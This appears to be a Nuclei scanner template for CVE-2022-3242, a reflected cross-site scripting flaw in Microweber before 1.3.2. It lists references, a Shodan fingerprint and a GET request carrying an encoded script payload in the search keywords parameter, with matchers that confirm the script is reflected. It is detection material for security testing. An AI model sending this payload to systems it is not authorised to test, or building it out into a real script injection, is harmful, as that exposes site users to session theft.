42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2022-3242
|
|
|
|
info:
|
|
name: Microweber <1.3.2 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.
|
|
reference:
|
|
- https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/
|
|
- https://www.tenable.com/cve/CVE-2022-3242
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3242
|
|
- https://github.com/microweber/microweber/commit/68f0721571653db865a5fa01c7986642c82e919c
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-3242
|
|
cwe-id: CWE-79,CWE-94
|
|
epss-score: 0.02392
|
|
epss-percentile: 0.88773
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: microweber
|
|
product: microweber
|
|
shodan-query: http.favicon.hash:780351152
|
|
tags: cve,cve2022,huntr,xss,microweber
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
|
|
condition: and
|
|
# digest: 490a0046304402206c0108c0fbf6e57197f9905e9c926e23a956935590a90ae3217ecb4239c2008e02201f248612292189a7c604f4fc055404c82c708c40d7293a9cd4dbc4641b56c8fa:922c64590222798bb761d5b6d8e72950 |